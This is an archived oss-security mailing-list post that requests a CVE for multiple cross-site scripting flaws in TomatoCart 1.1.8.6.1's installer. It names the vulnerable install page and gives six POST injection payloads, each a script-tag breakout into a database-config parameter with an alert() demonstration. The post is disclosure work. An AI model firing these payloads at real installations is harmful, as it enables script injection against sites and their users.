[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE request - TomatoCart 1.1.8.6.1 Multiple Cross-Site Scripting (XSS)
From: haojun hou <haojunhou () gmail ! com>
Date: 2016-11-24 7:25:10
Message-ID: 60EBD88B-40E8-47F9-B959-F8500C994D59 () gmail ! com
[Download RAW message or body]
Hi:
TomatoCart 1.1.8.6.1 - Multiple Cross-Site Scripting (XSS)
Procuct: TomatoCart
Vendor: TomatoCart http://www.tomatocart.com
Vunlerable Version: 1.1.8.6.1 and probably prior
Tested Version: 1.1.8.6.1
Author: Haojun Hou in ADLab of Venustech
Advisory Details:
Haojun Hou in ADLab of Venustech discovered Multiple Cross-Site Scripting (XSS) in TomatoCart \
1.1.8.6.1, which can be exploited to add,modify or delete information in application`s database \
and gain complete control over the application.
The vulnerability exists due to insufficientfiltration of user-supplied data in multiple HTTP \
POST parameters passed to \
¡°TomatoCart-v1-released-v1.1.8.6.1/install/templates/pages/step_5.php¡± url. An attacker could \
execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation examples below uses the "alert()" JavaScript function to see a pop-up \
messagebox:
(1)POST
DB_DATABASE= <>"?>";</script><script>alert(1);</script><script>"<?php"
(2)POST
DB_SERVER_PASSWORD= "?>";</script><script>alert(1);</script><script>"<?php"
(3)POST
DB_TABLE_PREFIX= "?>";</script><script>alert(1);</script><script>"<?php"
(4)POST
DB_DATABASE_CLASS= "?>";</script><script>alert(1);</script><script>"<?php"
(5)POST
DB_SERVER_USERNAME= "?>";</script><script>alert(1);</script><script>"<?php"
(6)POST
DB_SERVER= "?>";</script><script>alert(1);</script><script>"<?php"
Could you please help me assign a CVE for this issue?
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic